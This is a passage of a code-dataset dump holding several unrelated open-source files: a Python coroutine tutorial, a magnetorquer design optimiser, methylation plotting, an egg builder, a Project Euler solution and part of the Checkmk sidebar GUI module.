registry = AssetRegistry()\n registry.add_asset_reference('angular-resource', 'js')\n self.assertIn('angular-resource', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular-resource'], set([('angular','js')]))\n self.assertIn('angular', registry.assets['js'])\n self.assertEqual(registry.assets['js']['angular'], set())\n","repo_name":"ariovistus/django-pipejam","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27632474324","text":"\"\"\"\n\nDriving it with ``yield from``::\n\n >>> def summarize(results):\n ... while True:\n ... result = yield from averager()\n ... results.append(result)\n ...\n >>> results = []\n >>> summary = summarize(results)\n >>> next(summary)\n >>> for height in data['girls;m']:\n ... summary.send(height)\n ...\n >>> summary.send(None)\n >>> for height in data['boys;m']:\n ... summary.send(height)\n ...\n >>> summary.send(None)\n >>> results == [\n ... Result(count=10, average=1.4279999999999997),\n ... Result(count=9, average=1.3888888888888888)\n ... ]\n True\n\n\"\"\"\n\n# BEGIN YIELD_FROM_AVERAGER\nfrom collections import namedtuple\n\nResult = namedtuple('Result', 'count average')\n\n\n# the subgenerator\ndef averager(): # <1> 这里作为子生成器使用\n total = 0.0\n count = 0\n average = None\n while True:\n term = yield # <2> main 函数中的客户代码发送的各个值绑定到这里的 term 变量上\n if term is None: # <3> 至关重要的终止条件。如果不这么做,使用 yield from 调用这个协程的生成器会永远阻塞\n break\n total += term\n count += 1\n average = total / count\n return Result(count, average) # <4> 返回的 Result 会成为 grouper 函数中 yield from 表达式的值\n\n\n# the delegating generator\ndef grouper(results, key): # <5> grouper 是委派生成器\n while True: # <6> 这个循环每次迭代时会新建一个 averager 实例;每个实例都是作为协程使用的生成器对象。\n results[key] = yield from averager() # <7> grouper 发送的每个值都会经由 yield from 处理, 通过管道传给averager实例。\n # grouper 会在 yield from 表达式处暂停,等待 averager 实例处理客户端发来的值。averager 实例运行完毕后,返回的值绑定到 results[key] 上。while\n # 循环会不断创建averager 实例,处理更多的值\n\n\n# the client code, a.k.a. the caller\ndef main(data): # <8> main 函数是客户端代码,用 PEP 380 定义的术语来说,是“调用方”。这是驱动一切的函数\n results = {}\n for key, values in data.items():\n group = grouper(results,\n key) # <9> group 是调用 grouper 函数得到的生成器对象,传给 grouper\n # 函数的第一个参数是results,用于收集结果;第二个参数是某个键。group作为协程使用\n next(group) # <10> 预激 group 协程\n for value in values:\n group.send(value) # <11> 把各个 value 传给 grouper。传入的值最终到达 averager 函数中 term = yield 那一行;grouper 永远不知道传入的值是什么\n group.send(None) # important! <12> None 传入 grouper,导致当前的 averager 实例终止,也让 grouper 继续运行,再创建一个 averager 实例,处理下一组值\n\n # print(results) # uncomment to debug\n report(results)\n\n\n# output report\ndef report(results):\n for key, result in sorted(results.items()):\n group, unit = key.split(';')\n print('{:2} {:5} averaging {:.2f}{}'.format(\n result.count, group, result.average, unit))\n\n\ndata = {\n 'girls;kg':\n [40.9, 38.5, 44.3, 42.2, 45.2, 41.7, 44.5, 38.0, 40.6, 44.5],\n 'girls;m':\n [1.6, 1.51, 1.4, 1.3, 1.41, 1.39, 1.33, 1.46, 1.45, 1.43],\n 'boys;kg':\n [39.0, 40.8, 43.2, 40.8, 43.1, 38.6, 41.4, 40.6, 36.3],\n 'boys;m':\n [1.38, 1.5, 1.32, 1.25, 1.37, 1.48, 1.25, 1.49, 1.46],\n}\n\nif __name__ == '__main__':\n main(data)\n\n# END YIELD_FROM_AVERAGER\n","repo_name":"doyourutmost/python-study","sub_path":"learn-python/fluent_python/ch16-coroutine/coroaverager3.py","file_name":"coroaverager3.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2385331380","text":"from helper_conversions import *\nfrom spiral_simple_square import spiral_of_resistance\nfrom scipy import optimize\nimport output_KiCad_square_spiral\n\n'''\nMain program that outputs an optimized square magnetorquer given\nconstraints from config.ini\n'''\n\n# Read configuration\nconfig = ConfigParser()\nconfig.read(Path(__file__).with_name('config.ini'))\nconfig = config['Configuration']\n\n\ndef total_area_sum_from_ext_ohms(ext_ohms: float) -> float:\n '''\n Given the ohms per exterior layer, calculates the area-sum\n of the magnetorquer.\n\n Parameters:\n ext_ohms (float): the resistance (in ohms) per exterior layer\n Returns:\n - The total area_sum given this constraint\n\n '''\n\n\n int_ohms = int_ohms_from_ext_ohms(ext_ohms)\n int_layers = config.getint(\"NumberOfLayers\") - 2\n\n area_sum = 2 * spiral_of_resistance(ext_ohms, True)[0]\n area_sum += int_layers * spiral_of_resistance(int_ohms, False)[0]\n return area_sum\n\n\ndef get_optimal_front_resistance() -> float:\n '''\n Find the balance of exterior and interior spiral resistance that\n maximizes area-sum.\n\n Returns:\n - The optimal resistance per exterior layer spiral\n '''\n\n front_resistance = optimize.minimize_scalar(\n lambda r: -total_area_sum_from_ext_ohms(r),\n bounds=(0, config.getfloat(\"Resistance\")/2),\n method='bounded'\n ).x\n\n return front_resistance\n\n\ndef print_about_spiral(spiral, resistance):\n '''\n Helper function to print info about a spiral\n '''\n\n s = spiral\n print(f''' Area sum: {s[0]:.4f} m^2\n Inner radius: {s[1]:.4f} mm\n Number of coils: {s[2]:.4f}\n Length of trace: {s[4]:.4f} mm\n Resistance: {resistance:.4f} ohms\n ''')\n\n\nif __name__ == \"__main__\":\n\n # Collect data about the optimal spirals\n ext_ohms = get_optimal_front_resistance()\n int_ohms = int_ohms_from_ext_ohms(ext_ohms)\n exterior = spiral_of_resistance(ext_ohms, True)\n interior = spiral_of_resistance(int_ohms, False)\n\n # Print information about optimal magnetorquer\n total_area_sum = total_area_sum_from_ext_ohms(ext_ohms)\n print(\"Optimal properties calculated given config.ini:\")\n print(f\"Total area-sum: {total_area_sum:.4f} m^2\\n\")\n print(\"Properties per each of the 2 external spirals:\")\n print_about_spiral(exterior, ext_ohms)\n interior_layers = config.getint(\"NumberOfLayers\") - 2\n print(f\"Properties per each of the {interior_layers:d} internal spirals:\")\n print_about_spiral(interior, int_ohms)\n\n\n # Output the optimal spiral to KiCad_spiral.txt\n output_KiCad_square_spiral.save_magnetorquer(\n exterior[3], exterior[2], interior[3], interior[2])\n","repo_name":"manforowicz/Magnetorquer-Calc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"27950397273","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ns_8_cell = pd.read_csv('s_8_cell.deduplicated.bismark.cov', sep='\\t', \n names=['chr', 'start','end', 'meth_percent', 'meth_count', 'unmeth_count'])\n\nepiblast = pd.read_csv('s_epiblast.deduplicated.bismark.cov', sep='\\t', \n names=['chr', 'start','end', 'meth_percent', 'meth_count', 'unmeth_count'])\n\nicm = pd.read_csv('s_icm.deduplicated.bismark.cov', sep='\\t', \n names=['chr', 'start','end', 'meth_percent', 'meth_count', 'unmeth_count'])\n\nfrom google.colab import files\n\nsns.histplot(data=s_8_cell, x='meth_percent', bins=20, kde=True, kde_kws={'bw_adjust': 2})\nplt.title(\"8_cell\")\nplt.savefig('8_cell_hist.png')\nfiles.download(\"8_cell_hist.png\")\n\nsns.histplot(data=icm, x='meth_percent', bins=20, kde=True, kde_kws={'bw_adjust': 2})\nplt.title(\"icm\")\nplt.savefig('icm_hist.png')\nfiles.download(\"icm_hist.png\")\n\nsns.histplot(data=epiblast, x=\"meth_percent\", bins=20, kde=True, kde_kws={'bw_adjust': 2})\nplt.title(\"epiblast\")\nplt.savefig('epiblast_hist.png')\nfiles.download(\"epiblast_hist.png\")","repo_name":"Unknown-Negotiator/hse_hw1_meth","sub_path":"src/meth_hist.py","file_name":"meth_hist.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32555045202","text":"\"\"\"\\\nThis program creates an egg package (called update_NAME-1.0.egg),\nfor uptaing the package NAME.\n\"\"\"\nimport os\nimport zipfile\nfrom compiler import compileFile\nfrom os.path import join\nfrom optparse import OptionParser\n\n\n\ndef build_egg(name):\n py_module = 'update_%s.py' % name\n\n code = open('update_NAME.py').read()\n code = code.replace('@NAME@', name)\n open(py_module, 'w').write(code)\n compileFile(py_module)\n\n z = zipfile.ZipFile(join('update_%s-1.0.egg' % name),\n 'w', zipfile.ZIP_DEFLATED)\n for ext in ('', 'c'):\n z.write(py_module + ext)\n\n data = open('appinst.dat').read()\n data = data.replace('@NAME@', name)\n z.writestr('EGG-INFO/inst/appinst.dat', data)\n\n z.writestr('EGG-INFO/entry_points.txt',\n '[console_scripts]\\n'\n 'update-%s = update_%s:main\\n' % (name, name))\n z.write('update.ico', 'EGG-INFO/inst/update.ico')\n z.write('update.icns', 'EGG-INFO/inst/update.icns')\n z.close()\n\n for ext in ('', 'c'):\n os.unlink(py_module + ext)\n\n\ndef main():\n p = OptionParser(usage=\"usage: %prog [options] NAME\",\n description=__doc__)\n\n opts, args = p.parse_args()\n\n if len(args) != 1:\n p.error(\"exactly one argument expected, try -h\")\n\n build_egg(args[0])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pib/enstaller","sub_path":"examples/update/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2771790140","text":"'''Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).\nIf d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and each of a and b are called amicable numbers.\n\nFor example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.\n\nEvaluate the sum of all the amicable numbers under 10000.\n'''\nt = int(input('Enter a range to find amicable number pair of it : '))\n\namic = []\nfor n in range(1, t + 1):\n\n def divisors(n):\n global div\n div = []\n for i in range(1, n):\n if n % i == 0:\n div.append(i)\n return sum(div)\n\n divisors(n)\n print('All divisors of number ', n, 'is : ', div)\n y = sum(div)\n\n print('Sum of all divisors of ', n, 'is :', y)\n\n x = divisors(y)\n if x == n and y != x:\n\n amic.append(x)\n print(x, 'is a amicable number ')\nprint('Amicable pair in the range :', amic)\n","repo_name":"ratedrahul/Project-Euler-Solved","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19848343320","text":"import copy\nimport traceback\nimport json\nimport time\nfrom enum import Enum\nfrom typing import Any, Dict, List, Optional, Type, Union # pylint: disable=unused-import\n\nimport cmk\nimport cmk.utils.paths\n\nimport cmk.gui.i18n\nfrom cmk.gui.i18n import _\nfrom cmk.gui.globals import html\nimport cmk.gui.utils as utils\nimport cmk.gui.config as config\nimport cmk.gui.userdb as userdb\nimport cmk.gui.pagetypes as pagetypes\nimport cmk.gui.notify as notify\nimport cmk.gui.werks as werks\nimport cmk.gui.sites as sites\nimport cmk.gui.pages\nimport cmk.gui.plugins.sidebar\nimport cmk.gui.plugins.sidebar.quicksearch\nfrom cmk.gui.valuespec import CascadingDropdown, Dictionary\nfrom cmk.gui.exceptions import MKGeneralException, MKUserError\nfrom cmk.gui.log import logger\n\nif not cmk.is_raw_edition():\n import cmk.gui.cee.plugins.sidebar\n\nif cmk.is_managed_edition():\n import cmk.gui.cme.plugins.sidebar\n\n# Helper functions to be used by snapins\n# Kept for compatibility with legacy plugins\n# TODO: Drop once we don't support legacy snapins anymore\nfrom cmk.gui.plugins.sidebar.utils import ( # pylint: disable=unused-import\n snapin_registry, snapin_width, snapin_site_choice, visuals_by_topic, render_link, heading, link,\n simplelink, bulletlink, iconlink, nagioscgilink, footnotelinks, begin_footnote_links,\n end_footnote_links, write_snapin_exception,\n)\n\nfrom cmk.gui.plugins.sidebar.quicksearch import QuicksearchMatchPlugin # pylint: disable=unused-import\n\nquicksearch_match_plugins = [] # type: List[QuicksearchMatchPlugin]\n\n# Datastructures and functions needed before plugins can be loaded\nloaded_with_language = False\nsearch_plugins = [] # type: List\n\n# TODO: Kept for pre 1.6 plugin compatibility\nsidebar_snapins = {} # type: Dict[str, Dict]\n\n\ndef load_plugins(force):\n global loaded_with_language, search_plugins\n _register_custom_snapins()\n\n if loaded_with_language == cmk.gui.i18n.get_current_language() and not force:\n return\n\n # Load all snapins\n search_plugins = []\n\n utils.load_web_plugins(\"sidebar\", globals())\n\n transform_old_dict_based_snapins()\n transform_old_quicksearch_match_plugins()\n\n # This must be set after plugin loading to make broken plugins raise\n # exceptions all the time and not only the first time (when the plugins\n # are loaded).\n loaded_with_language = cmk.gui.i18n.get_current_language()\n\n\n# Pre Check_MK 1.5 the snapins were declared with dictionaries like this:\n#\n# sidebar_snapins[\"about\"] = {\n# \"title\" : _(\"About Check_MK\"),\n# \"description\" : _(\"Version information and Links to Documentation, \"\n# \"Homepage and Download of Check_MK\"),\n# \"render\" : render_about,\n# \"allowed\" : [ \"admin\", \"user\", \"guest\" ],\n# }\n#\n# Convert it to objects to be compatible\n# TODO: Deprecate this one day.\ndef transform_old_dict_based_snapins():\n # type: () -> None\n for snapin_id, snapin in sidebar_snapins.items():\n\n @snapin_registry.register\n class LegacySnapin(cmk.gui.plugins.sidebar.SidebarSnapin):\n _type_name = snapin_id\n _spec = snapin\n\n @classmethod\n def type_name(cls):\n return cls._type_name\n\n @classmethod\n def title(cls):\n return cls._spec[\"title\"]\n\n @classmethod\n def description(cls):\n return cls._spec.get(\"description\", \"\")\n\n def show(self):\n return self._spec[\"render\"]()\n\n @classmethod\n def refresh_regularly(cls):\n return cls._spec.get(\"refresh\", False)\n\n @classmethod\n def refresh_on_restart(cls):\n return cls._spec.get(\"restart\", False)\n\n @classmethod\n def allowed_roles(cls):\n return cls._spec[\"allowed\"]\n\n def styles(self):\n return self._spec.get(\"styles\")\n\n # Help pylint a little bit, it doesn't know that the registry remembers the class above.\n _it_is_really_used = LegacySnapin\n\n\n# TODO: Deprecate this one day.\ndef transform_old_quicksearch_match_plugins():\n # type: () -> None\n for match_plugin in quicksearch_match_plugins:\n cmk.gui.plugins.sidebar.quicksearch.match_plugin_registry.register(match_plugin)\n\n\nclass UserSidebarConfig(object):\n \"\"\"Manages the configuration of the users sidebar\"\"\"\n def __init__(self, user, default_config):\n super(UserSidebarConfig, self).__init__()\n self._user = user\n self._default_config = copy.deepcopy(default_config)\n self._config = self._load()\n\n @property\n def folded(self):\n return self._config[\"fold\"]\n\n @folded.setter\n def folded(self, value):\n # type: (bool) -> None\n self._config[\"fold\"] = value\n\n def add_snapin(self, snapin):\n # type: (UserSidebarSnapin) -> None\n self.snapins.append(snapin)\n\n def move_snapin_before(self, snapin, other):\n # type: (UserSidebarSnapin, Optional[UserSidebarSnapin]) -> None\n \"\"\"Move the given snapin before the other given snapin.\n The other may be None. In this case the snapin is moved to the end.\n \"\"\"\n self.snapins.remove(snapin)\n\n if other in self.snapins:\n other_index = self.snapins.index(other)\n self.snapins.insert(other_index, snapin)\n else:\n self.snapins.append(snapin)\n\n def remove_snapin(self, snapin):\n # type: (UserSidebarSnapin) -> None\n \"\"\"Remove the given snapin from the users sidebar\"\"\"\n self.snapins.remove(snapin)\n\n def get_snapin(self, snapin_id):\n # type: (str) -> UserSidebarSnapin\n for snapin in self.snapins:\n if snapin.snapin_type.type_name() == snapin_id:\n return snapin\n raise KeyError(\"Snapin %r does not exist\" % snapin_id)\n\n @property\n def snapins(self):\n # type: () -> List[UserSidebarSnapin]\n return self._config[\"snapins\"]\n\n def _initial_config(self):\n # type: () -> Dict[str, Union[bool, List[Dict[str, Any]]]]\n return {\n \"snapins\": self._transform_legacy_tuples(self._default_config),\n \"fold\": False,\n }\n\n def _user_config(self):\n return self._user.load_file(\"sidebar\", deflt=self._initial_config())\n\n def _load(self):\n \"\"\"Load current state of user's sidebar\n\n Convert from old format (just a snapin list) to the new format\n (dictionary) on the fly\"\"\"\n user_config = self._user_config()\n\n user_config = self._transform_legacy_list_config(user_config)\n user_config[\"snapins\"] = self._transform_legacy_tuples(user_config[\"snapins\"])\n user_config[\"snapins\"] = self._transform_legacy_off_state(user_config[\"snapins\"])\n\n # Remove not existing (e.g. legacy) snapins\n user_config[\"snapins\"] = [\n e for e in user_config[\"snapins\"] if e[\"snapin_type_id\"] in snapin_registry\n ]\n\n user_config = self._from_config(user_config)\n\n # Remove entries the user is not allowed for\n user_config[\"snapins\"] = [\n e for e in user_config[\"snapins\"] if config.user.may(e.snapin_type.permission_name())\n ]\n\n return user_config\n\n def _transform_legacy_list_config(self, user_config):\n if not isinstance(user_config, list):\n return user_config\n\n return {\n \"snapins\": user_config,\n \"fold\": False,\n }\n\n def _transform_legacy_off_state(self, snapins):\n return [e for e in snapins if e[\"visibility\"] != \"off\"]\n\n def _transform_legacy_tuples(self, snapins):\n # type: (Any) -> List[Dict[str, Any]]\n return [{\n \"snapin_type_id\": e[0],\n \"visibility\": e[1]\n } if isinstance(e, tuple) else e for e in snapins]\n\n def save(self):\n # type: () -> None\n if self._user.may(\"general.configure_sidebar\"):\n self._user.save_file(\"sidebar\", self._to_config())\n\n def _from_config(self, cfg):\n return {\n \"fold\": cfg[\"fold\"],\n \"snapins\": [UserSidebarSnapin.from_config(e) for e in cfg[\"snapins\"]]\n }\n\n def _to_config(self):\n # type: () -> Dict[str, Any]\n return {\n \"fold\": self._config[\"fold\"],\n \"snapins\": [e.to_config() for e in self._config[\"snapins\"]]\n }\n\n\nclass SnapinVisibility(Enum):\n OPEN = \"open\"\n CLOSED = \"closed\"\n\n\nclass UserSidebarSnapin(object):\n \"\"\"An instance of a snapin that is configured in the users sidebar\"\"\"\n @staticmethod\n def from_config(cfg):\n # type: (Dict[str, Type[cmk.gui.plugins.sidebar.SidebarSnapin]]) -> UserSidebarSnapin\n \"\"\" Construct a UserSidebarSnapin object from the persisted data structure\"\"\"\n snapin_class = snapin_registry[cfg[\"snapin_type_id\"]]\n return UserSidebarSnapin(snapin_class, SnapinVisibility(cfg[\"visibility\"]))\n\n @staticmethod\n def from_snapin_type_id(snapin_type_id):\n # type: (str) -> UserSidebarSnapin\n return UserSidebarSnapin(snapin_registry[snapin_type_id])\n\n def __init__(self, snapin_type, visibility=SnapinVisibility.OPEN):\n # type: (Type[cmk.gui.plugins.sidebar.SidebarSnapin], SnapinVisibility) -> None\n super(UserSidebarSnapin, self).__init__()\n self.snapin_type = snapin_type\n self.visible = visibility\n\n def to_config(self):\n # type: () -> Dict[str, Any]\n return {\n \"snapin_type_id\": self.snapin_type.type_name(),\n \"visibility\": self.visible.value,\n }\n\n def __eq__(self, other):\n # type: (Any) -> bool\n if not isinstance(other, UserSidebarSnapin):\n return False\n\n return self.snapin_type == other.snapin_type and self.visible == other.visible\n\n def __ne__(self, other):\n # type: (Any) -> bool\n return not self.__eq__(other)\n\n\nclass SidebarRenderer(object):\n def show(self):\n # type: () -> None\n if not config.user.may(\"general.see_sidebar\"):\n return None\n if config.sidebar_notify_interval is not None:\n interval = config.sidebar_notify_interval\n else:\n interval = 'null'\n html.clear_default_javascript()\n html.html_head(_(\"Check_MK Sidebar\"), javascripts=[\"side\"])\n html.write('\\n' % interval)\n html.open_div(id_=\"check_mk_sidebar\")\n\n self._sidebar_head()\n user_config = UserSidebarConfig(config.user, config.sidebar)\n refresh_snapins = []\n restart_snapins = []\n\n html.open_div(class_=\"scroll\" if config.sidebar_show_scrollbar else None,\n id_=\"side_content\")\n for snapin in user_config.snapins:\n name = snapin.snapin_type.type_name()\n\n # Performs the initial rendering and might return an optional refresh url,\n # when the snapin contents are refreshed from an external source\n refresh_url = self.render_snapin(snapin)\n\n if snapin.snapin_type.refresh_regularly():\n refresh_snapins.append([name, refresh_url])\n\n elif snapin.snapin_type.refresh_on_restart():\n refresh_snapins.append([name, refresh_url])\n restart_snapins.append(name)\n\n html.close_div()\n self._sidebar_foot(user_config)\n html.close_div()\n\n html.write(\"\\n\")\n\n html.body_end()\n\n def render_snapin(self, snapin):\n # type: (UserSidebarSnapin) -> str\n snapin_class = snapin.snapin_type\n name = snapin_class.type_name()\n snapin_instance = snapin_class()\n\n html.open_div(id_=\"snapin_container_%s\" % name, class_=\"snapin\")\n self._render_snapin_styles(snapin_instance)\n # When not permitted to open/close snapins, the snapins are always opened\n if snapin.visible == SnapinVisibility.OPEN or not config.user.may(\n \"general.configure_sidebar\"):\n style = None\n else:\n style = \"display:none\"\n\n toggle_url = \"sidebar_openclose.py?name=%s&state=\" % name\n\n # If the user may modify the sidebar then add code for dragging the snapin\n head_actions = {} # type: Dict[str, str]\n if config.user.may(\"general.configure_sidebar\"):\n head_actions = {\n \"onmouseover\": \"document.body.style.cursor='move';\",\n \"onmouseout \": \"document.body.style.cursor='';\",\n \"onmousedown\": \"cmk.sidebar.snapin_start_drag(event)\",\n \"onmouseup\": \"cmk.sidebar.snapin_stop_drag(event)\"\n }\n\n html.open_div(class_=[\"head\", snapin.visible.value], **head_actions)\n\n if config.user.may(\"general.configure_sidebar\"):\n # Icon for mini/maximizing\n html.div(\"\",\n class_=\"minisnapin\",\n title=_(\"Toggle this snapin\"),\n onclick=\"cmk.sidebar.toggle_sidebar_snapin(this, '%s')\" % toggle_url)\n\n # Button for closing (removing) a snapin\n html.open_div(class_=\"closesnapin\")\n close_url = \"sidebar_openclose.py?name=%s&state=off\" % name\n html.icon_button(url=None,\n title=_(\"Remove this snapin\"),\n icon=\"closesnapin\",\n onclick=\"cmk.sidebar.remove_sidebar_snapin(this, '%s')\" % close_url)\n html.close_div()\n\n # The heading. A click on the heading mini/maximizes the snapin\n toggle_actions = {} # type: Dict[str, str]\n if config.user.may(\"general.configure_sidebar\"):\n toggle_actions = {\n \"onclick\": \"cmk.sidebar.toggle_sidebar_snapin(this,'%s')\" % toggle_url,\n \"onmouseover\": \"this.style.cursor='pointer'\",\n \"onmouseout\": \"this.style.cursor='auto'\"\n }\n html.b(snapin_class.title(), class_=[\"heading\"], **toggle_actions)\n\n # End of header\n html.close_div()\n\n # Now comes the content\n html.open_div(class_=\"content\", id_=\"snapin_%s\" % name, style=style)\n refresh_url = ''\n try:\n # TODO: Refactor this confusing special case. Add deddicated method or something\n # to let the snapins make the sidebar know that there is a URL to fetch.\n url = snapin_instance.show()\n if not url is None:\n # Fetch the contents from an external URL. Don't render it on our own.\n refresh_url = url\n html.javascript(\n \"cmk.ajax.get_url(\\\"%s\\\", cmk.utils.update_contents, \\\"snapin_%s\\\")\" %\n (refresh_url, name))\n except Exception as e:\n logger.exception()\n write_snapin_exception(e)\n html.close_div()\n html.close_div()\n return refresh_url\n\n def _render_snapin_styles(self, snapin_instance):\n # type: (cmk.gui.plugins.sidebar.SidebarSnapin) -> None\n styles = snapin_instance.styles()\n if styles:\n html.open_style()\n html.write(styles)\n html.close_style()\n\n def _sidebar_head(self):\n html.open_div(id_=\"side_header\")\n html.div('', id_=\"side_fold\")\n html.open_a(href=config.user.get_attribute(\"start_url\") or config.start_url,\n target=\"main\",\n title=_(\"Go to main overview\"))\n html.div(\"\", id_=\"side_bg\")\n\n if config.sidebar_show_version_in_sidebar:\n html.open_div(id_=\"side_version\")\n html.open_a(href=\"version.py\", target=\"main\", title=_(\"Open release notes\"))\n html.write(self._get_check_mk_edition_title())\n html.br()\n html.write(cmk.__version__)\n\n if werks.may_acknowledge():\n num_unacknowledged_werks = werks.num_unacknowledged_incompatible_werks()\n if num_unacknowledged_werks:\n html.span(num_unacknowledged_werks,\n class_=\"unack_werks\",\n title=_(\"%d unacknowledged incompatible werks\") %\n num_unacknowledged_werks)\n\n html.close_a()\n html.close_div()\n html.close_a()\n html.close_div()\n\n def _get_check_mk_edition_title(self):\n if cmk.is_enterprise_edition():\n if cmk.is_demo():\n return \"Enterprise (Demo)\"\n return \"Enterprise\"\n\n elif cmk.is_managed_edition():\n return \"Managed\"\n\n return \"Raw\"\n\n def _sidebar_foot(self, user_config):\n html.open_div(id_=\"side_footer\")\n if config.user.may(\"general.configure_sidebar\"):\n html.icon_button(\"sidebar_add_snapin.py\",\n _(\"Add snapin to the sidebar\"),\n \"sidebar_addsnapin\",\n target=\"main\")\n # editing the profile is not possible on remote sites which are sync targets\n # of a central WATO system\n if config.wato_enabled and \\\n (config.user.may(\"general.edit_profile\") or config.user.may(\"general.change_password\")):\n html.icon_button(\"user_profile.py\",\n _(\"Edit your personal settings, change your password\"),\n \"sidebar_settings\",\n target=\"main\")\n if config.user.may(\"general.logout\") and not config.auth_by_http_header:\n html.icon_button(\"logout.py\", _(\"Log out\"), \"sidebar_logout\", target=\"_top\")\n\n html.icon_button(\"return void();\",\n _(\"You have pending messages.\"),\n \"sidebar_messages\",\n onclick='cmk.sidebar.read_message()',\n id_='msg_button',\n style='display:none')\n html.open_div(style=\"display:none;\", id_=\"messages\")\n self.render_messages()\n html.close_div()\n\n html.open_div(class_=[\"copyright\"])\n html.write(\"© \" +\n html.render_a(\"tribe29 GmbH\", target=\"_blank\", href=\"https://checkmk.com\"))\n html.close_div()\n html.close_div()\n\n if user_config.folded:\n html.final_javascript(\"cmk.sidebar.fold_sidebar();\")\n\n def render_messages(self):\n for msg in notify.get_gui_messages():\n if 'gui_hint' in msg['methods']:\n html.open_div(id_=\"message-%s\" % msg['id'], class_=[\"popup_msg\"])\n html.a(\"x\",\n href=\"javascript:void(0)\",\n class_=[\"close\"],\n onclick=\"cmk.sidebar.message_close(\\'%s\\')\" % msg['id'])\n html.write_text(msg['text'].replace('\\n', '
\\n'))\n html.close_div()\n if 'gui_popup' in msg['methods']:\n html.javascript('alert(\\'%s\\'); cmk.sidebar.mark_message_read(\"%s\")' %\n (html.attrencode(msg['text']).replace('\\n', '\\\\n'), msg['id']))\n\n\n@cmk.gui.pages.register(\"side\")\ndef page_side():\n SidebarRenderer().show()\n\n\n@cmk.gui.pages.register(\"sidebar_snapin\")\ndef ajax_snapin():\n \"\"\"Renders and returns the contents of the requested sidebar snapin(s) in JSON format\"\"\"\n html.set_output_format(\"json\")\n # Update online state of the user (if enabled)\n userdb.update_user_access_time(config.user.id)\n\n user_config = UserSidebarConfig(config.user, config.sidebar)\n\n snapin_id = html.request.var(\"name\")\n snapin_ids = [snapin_id] if snapin_id else html.request.var(\"names\", \"\").split(\",\")\n\n snapin_code = []\n for snapin_id in snapin_ids:\n snapin_instance = user_config.get_snapin(snapin_id).snapin_type()\n if not config.user.may(snapin_instance.permission_name()):\n continue\n\n # When restart snapins are about to be refreshed, only render\n # them, when the core has been restarted after their initial\n # rendering\n if not snapin_instance.refresh_regularly() and snapin_instance.refresh_on_restart():\n since = float(html.request.var('since', 0))\n newest = since\n for site in sites.states().values():\n prog_start = site.get(\"program_start\", 0)\n if prog_start > newest:\n newest = prog_start\n if newest <= since:\n # no restart\n snapin_code.append('')\n continue\n\n with html.plugged():\n try:\n snapin_instance.show()\n except Exception as e:\n write_snapin_exception(e)\n e_message = _(\"Exception during snapin refresh (snapin \\'%s\\')\"\n ) % snapin_instance.type_name()\n logger.error(\"%s %s: %s\" %\n (html.request.requested_url, e_message, traceback.format_exc()))\n finally:\n snapin_code.append(html.drain())\n\n html.write(json.dumps(snapin_code))\n\n\n@cmk.gui.pages.register(\"sidebar_fold\")\ndef ajax_fold():\n html.set_output_format(\"json\")\n user_config = UserSidebarConfig(config.user, config.sidebar)\n user_config.folded = html.request.var(\"fold\") == \"yes\"\n user_config.save()\n\n\n@cmk.gui.pages.register(\"sidebar_openclose\")\ndef ajax_openclose():\n # type: () -> None\n html.set_output_format(\"json\")\n if not config.user.may(\"general.configure_sidebar\"):\n return None\n\n snapin_id = html.request.var(\"name\")\n state = html.request.var(\"state\")\n if state not in [SnapinVisibility.OPEN.value, SnapinVisibility.CLOSED.value, \"off\"]:\n raise MKUserError(\"state\", \"Invalid state: %s\" % state)\n\n user_config = UserSidebarConfig(config.user, config.sidebar)\n\n try:\n snapin = user_config.get_snapin(snapin_id)\n except KeyError:\n return None\n\n if state == \"off\":\n user_config.remove_snapin(snapin)\n else:\n snapin.visible = SnapinVisibility(state)\n\n user_config.save()\n\n\n@cmk.gui.pages.register(\"sidebar_move_snapin\")\ndef move_snapin():\n # type: () -> None\n html.set_output_format(\"json\")\n if not config.user.may(\"general.configure_sidebar\"):\n return None\n\n snapin_id = html.request.var(\"name\")\n before_id = html.request.var(\"before\")\n\n user_config = UserSidebarConfig(config.user, config.sidebar)\n\n try:\n snapin = user_config.get_snapin(snapin_id)\n except KeyError:\n return None\n\n try:\n before_snapin = user_config.get_snapin(before_id) # type: Optional[UserSidebarSnapin]\n except KeyError:\n before_snapin = None\n\n user_config.move_snapin_before(snapin, before_snapin)\n user_config.save()\n\n\n@cmk.gui.pages.register(\"sidebar_get_messages\")\ndef ajax_get_messages():\n SidebarRenderer().render_messages()\n\n\n@cmk.gui.pages.register(\"sidebar_message_read\")\ndef ajax_message_read():\n html.set_output_format(\"json\")\n try:\n notify.delete_gui_message(html.request.var('id'))\n html.write(\"OK\")\n except:\n if config.debug:\n raise\n html.write(\"ERROR\")\n\n\n#.\n# .--Custom-Snapins------------------------------------------------------.\n# | ____ _ ____ _ |\n# | / ___| _ ___| |_ / ___| _ __ __ _ _ __ (_)_ __ ___ |\n# | | | | | | / __| __| \\___ \\| '_ \\ / _` | '_ \\| | '_ \\/ __| |\n# | | |__| |_| \\__ \\ |_ _ ___) | | | | (_| | |_) | | | | \\__ \\ |\n# | \\____\\__,_|___/\\__(_)____/|_| |_|\\__,_| .__/|_|_| |_|___/ |\n# | |_| 